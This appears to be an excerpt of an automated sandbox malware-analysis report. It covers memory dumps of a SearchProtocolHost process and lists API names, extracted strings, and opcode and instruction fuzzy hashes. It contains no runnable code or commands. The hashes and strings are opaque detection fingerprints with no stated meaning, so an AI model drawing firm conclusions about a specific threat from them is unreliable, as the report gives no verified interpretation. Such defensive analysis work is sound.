                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                                                  • Instruction ID: d1f875d3cb43da33891daf6be89057e1b74d373d78438599745ecea66af3179f
                                                                                  • Opcode Fuzzy Hash: b0c3561975e8df5829d7d66e24a3c02e50a0ddf0ef6dad8d752497c06571edb3
                                                                                  • Instruction Fuzzy Hash: 50E05B79A5014EEBEB40CBC4C881FEDB3B4EB0C208F105285F91CD7240D630EA45CB41
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: b8cf2752db765ccfaac3f949200ad99df3389d25d981ca5b41814db9233aab51
                                                                                  • Instruction ID: 8cd8da46ccf264a6b667754784d760204592a9a8078d511aeb071fcb1aaaa2b2
                                                                                  • Opcode Fuzzy Hash: b8cf2752db765ccfaac3f949200ad99df3389d25d981ca5b41814db9233aab51
                                                                                  • Instruction Fuzzy Hash: 36B09B719115D5C5DA15E7604608717790467D0701F1AC461F3030641E4779C1D1E575
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4521090324.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_3520000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dffcfc8d1bf7d449985e0110806286dec676aaf9a09f9f4bc9e2fc368ace8b7d
                                                                                  • Instruction ID: c6721dd5164c17c5ee15ec3de17deb47469eab85e5e8aaacc804e6a7c70d50a6
                                                                                  • Opcode Fuzzy Hash: dffcfc8d1bf7d449985e0110806286dec676aaf9a09f9f4bc9e2fc368ace8b7d
                                                                                  • Instruction Fuzzy Hash: 6941F970609B1E4FD368EF68E081676B7F1FF86300F50052DD98AC36A2E774E8468785
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4521090324.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_3520000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                  • API String ID: 0-3558027158
                                                                                  • Opcode ID: 6cba4c29fe6eb188de62f531a6f215d18f64100a94d38c6df01c95bdf134c95a
                                                                                  • Instruction ID: 9c3ff013d5f84f45b873579d03579a0dc0e638923bca73f6b76bc1ad0ef11810
                                                                                  • Opcode Fuzzy Hash: 6cba4c29fe6eb188de62f531a6f215d18f64100a94d38c6df01c95bdf134c95a
                                                                                  • Instruction Fuzzy Hash: DC914FF04082988AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4521090324.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_3520000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $Web$($hm$*661$*7*6$,FF5$-$Et$-$Ra$/$,O$1*4$$173*$3*71$4?$P$6$Ik$71/$Ik~m$LPIH$afOm$agok$evm+$fmha$hhe+$j+54$kqgl$oa$C$p+17$thaS$vwmk
                                                                                  • API String ID: 0-132586805
                                                                                  • Opcode ID: e48f924f4b741f707bdc201864ba7c3de32ecc9d62ad808335acddf26c4cf2b9
                                                                                  • Instruction ID: 4b8acf8a9de542c0c6830696e0e6ea22a8a7078ca54f694ece776e5459760d9b
                                                                                  • Opcode Fuzzy Hash: e48f924f4b741f707bdc201864ba7c3de32ecc9d62ad808335acddf26c4cf2b9
                                                                                  • Instruction Fuzzy Hash: 0941A6B450470CDBCF28EF04E545AED7BB0FF01304F815269E909AE2A1DB358696CB85
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: e75dc2ff29e39c18d3cb83d1b0ef01e5c65f781ce1c8d34c3cf985a7516d0fae
                                                                                  • Instruction ID: af2c3a222983c4abd5758a93d262297c6601b315871d4ce006e4f5bc3fde3943
                                                                                  • Opcode Fuzzy Hash: e75dc2ff29e39c18d3cb83d1b0ef01e5c65f781ce1c8d34c3cf985a7516d0fae
                                                                                  • Instruction Fuzzy Hash: BF51E7B6A20216FFCB14DF99C89097EFBB8BB082417148669F465D7641D374DE908BA0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  • Opcode ID: a680f2faa8f26d2efcfd635627ad7a6eec177ed0a5b8a29fb556a027611febe3
                                                                                  • Instruction ID: b83e4b823cec601959db2cc5258bda946b28c97e19374ce7b767a46765ca314a
                                                                                  • Opcode Fuzzy Hash: a680f2faa8f26d2efcfd635627ad7a6eec177ed0a5b8a29fb556a027611febe3
                                                                                  • Instruction Fuzzy Hash: 8E51F5B5A10746EFCB24DE5CC8909BFB7FDEB48340B088C59E5A5D7641D7B4EA808760
                                                                                  Strings
                                                                                  • ExecuteOptions, xrefs: 032746A0
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03274787
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032746FC
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03274655
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03274725
                                                                                  • Execute=1, xrefs: 03274713
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03274742
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  • Opcode ID: eb239e131f992175188575ff552ae5960b100d10f62c553a58d497cc320998e8
                                                                                  • Instruction ID: 4cd9f7088752fbaea9ba04401998fbfcba9b08ae8be0dc2dac355d6126b12669
                                                                                  • Opcode Fuzzy Hash: eb239e131f992175188575ff552ae5960b100d10f62c553a58d497cc320998e8
                                                                                  • Instruction Fuzzy Hash: 3E5107F566031A7BDF14EBA9EC99FAE73A8EF09310F0400A9D505AB181D7B19AC5CF50
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-$0$0
                                                                                  • API String ID: 1302938615-699404926
                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction ID: b54552a0e6db7e74d1487aae5e9871d2041a69f74f6d11230ee5004b696edaee
                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                  • Instruction Fuzzy Hash: BC81BE35E2524A9ADF2DCF68C9917FEBBA6AF45320F1C4259D8E1A7390C674C8C0CB50
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: 71d1a66a713a742185c8d27700aa89c25d70338de3a1929f5ea5c4b66a6d11b6
                                                                                  • Instruction ID: 05ff8c0bf04ecfc6e1a58b2e4c2f1621e18011630fa5f8bf53ffb1401c95cc84
                                                                                  • Opcode Fuzzy Hash: 71d1a66a713a742185c8d27700aa89c25d70338de3a1929f5ea5c4b66a6d11b6
                                                                                  • Instruction Fuzzy Hash: 95215376A20319ABCB10DE69DC40AEEB7F8EF44784F080516E915E7201E770DA428BA1
                                                                                  Strings
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032702BD
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032702E7
                                                                                  • RTL: Re-Waiting, xrefs: 0327031E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: 842d5a2117beac6071f92862a414a23dede4977f11f8ae8e913e4bbceac4b1b4
                                                                                  • Instruction ID: 427ba5548b9bcca4e84fb3f27e1200725e49c8835b59d5f3e57fa3acc58388cd
                                                                                  • Opcode Fuzzy Hash: 842d5a2117beac6071f92862a414a23dede4977f11f8ae8e913e4bbceac4b1b4
                                                                                  • Instruction Fuzzy Hash: 34E1AF31624742AFD725CF28C984B2ABBF0FB44714F184A6DF5A58B2D1D7B4D984CB42
                                                                                  Strings
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03277B7F
                                                                                  • RTL: Resource at %p, xrefs: 03277B8E
                                                                                  • RTL: Re-Waiting, xrefs: 03277BAC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: 63f1e7cae81768c6b6b5b368e60fca6c66dced1ad7ba7ba8d14ae684b44c8ce7
                                                                                  • Instruction ID: a1844c3743e8a311343fd4c5519365ad673b1a97c6d2442102b9c0314dadec59
                                                                                  • Opcode Fuzzy Hash: 63f1e7cae81768c6b6b5b368e60fca6c66dced1ad7ba7ba8d14ae684b44c8ce7
                                                                                  • Instruction Fuzzy Hash: 1441F3753217039FC724DE29C840B6AB7E5EF8A721F140A2DF95ADB280DB71E4858B91
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0327728C
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 032772A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03277294
                                                                                  • RTL: Re-Waiting, xrefs: 032772C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: aee1f61436d26baf1ea5656d04acf9b37f6b293ab3932a4d6cdd3f13b8504bcf
                                                                                  • Instruction ID: 0547e7cee42b08b3b6ac6f46e750676258eb85fabcaf8bf7016737d41e8c8c64
                                                                                  • Opcode Fuzzy Hash: aee1f61436d26baf1ea5656d04acf9b37f6b293ab3932a4d6cdd3f13b8504bcf
                                                                                  • Instruction Fuzzy Hash: 2F41F075720302AFC720DE29CC41F6AB7A5FF85B11F140619FD65AB280DB71E88287D0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: 3127cc067aa7755880129b8467ae7863982676bfde4fa94eaab86ee6ffd25d71
                                                                                  • Instruction ID: a69506941da688d7d819ec5cdc94238d4c5b64047c9683b7c05e68647f375697
                                                                                  • Opcode Fuzzy Hash: 3127cc067aa7755880129b8467ae7863982676bfde4fa94eaab86ee6ffd25d71
                                                                                  • Instruction Fuzzy Hash: E4314676A10719DFCB20DF29DC40BEEB7B8EB44750F544955E849E7240EB709A858BB0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: c813db90b2f44fff073440d685b38ddc6a088ec403d43be3987e9f7eff0ac718
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: 3D919071E303179ADB2CDE6DC880ABEB7A5BF44720F59461AE875AB2C0D77099C18B50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: 5d0ad6d40fe8dc6205cb7f6015f231772cc39e9b2f406a5fa84fd00d4183b096
                                                                                  • Instruction ID: 90f243f13dfe4756c902748efddbe33ef172fd5789e0c0ae27932bece71d67ed
                                                                                  • Opcode Fuzzy Hash: 5d0ad6d40fe8dc6205cb7f6015f231772cc39e9b2f406a5fa84fd00d4183b096
                                                                                  • Instruction Fuzzy Hash: DF814875D10269DBDB35DB54CC44BEAB6B8AF08710F0445EAA90AB7291E7709EC4CFA0